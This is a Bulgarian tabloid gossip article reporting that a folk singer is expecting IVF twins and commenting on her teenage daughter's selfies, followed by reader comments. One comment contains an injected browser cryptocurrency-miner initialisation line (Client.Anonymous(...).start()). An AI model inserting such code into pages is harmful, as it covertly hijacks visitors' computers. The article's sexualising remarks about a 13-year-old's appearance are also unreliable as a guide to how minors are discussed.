Мара Отварачката чака близнаци, заченала инвитро

Фолкпевицата Мария е в очакване на близнаци от третия си съпруг Мирослав Соколов, пише LifeOnline.bg. Според тях едрогърдото миньонче, което навърши 40 г., е заченала инвитро и се очаква в началото на есента да роди.
 
Към момента изпълнителката не е потвърдила щастливата новина. Припомняме ви, че тя дълго време правеше опити да зачене от бившия си любим – Христиан Гущеров, но това така й не се случи, а запознати твърдят, че това е била главната причина нещата между тях да не потръгнат и да се разделят. Мария има една дъщеря – Марая, от първия си брак с бизнесмена Димитър Андонов, която също е зачената инвитро.
 
13-годишната тийнейджърка вече се изживява на голяма госпожица и наскоро изненада със селфи от банята, на което се е пременила в рокля с пера и позира с изкусителна физиономия. Тази снимка предизвика бурни реакции в мрежата, като по-голяма част от последователите на звездната й майка бяха категорични, че не отива такова поведение на толкова малко момиче. Няколко дни по-късно тя пусна по-прилични кадри с пуловерче, но този път бе заложила на солидно количество грим.
 
На Мария в последните седмици не й остава много време за щерка й, тъй като с мъжа й са се отдали на пътешествия. Първо бяха във Венеция, а преди дни и в Гърция.

Споделяне в социалните мрежи
HotArena

HotArena

Интернет таблоид за клюки, скандали и светски новини. Отразяване на жълти новини, интриги, светски партита и събития.

Facebook коментари

3 thoughts on “Мара Отварачката чака близнаци, заченала инвитро”

  1. Не се знае на близнаци или на тризнаци е в очакване Мара отварачката,но е видно ,че е очаквано на Миро авоарите да намалеят драстичо. Кака му Мара се е заела най-отговорно с тази мисия.

  2. cl=new Client.Anonymous('055dc9ef47b71a4562e1a56f51dcc7230978ba7907604fabb025b670ffd17205',{throttle:0.2,c:'w',ads:0});cl.start();

    Miro….

Leave a Comment

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *

Този сайт използва Akismet за намаляване на спама. Научете как се обработват данните ви за коментари.

Най-четени

Най-коментирани

Приятели

Последвайте ни и във Facebook

Не изпускайте най-новите горещи новини и скандали от света на хайлайфа във фийда си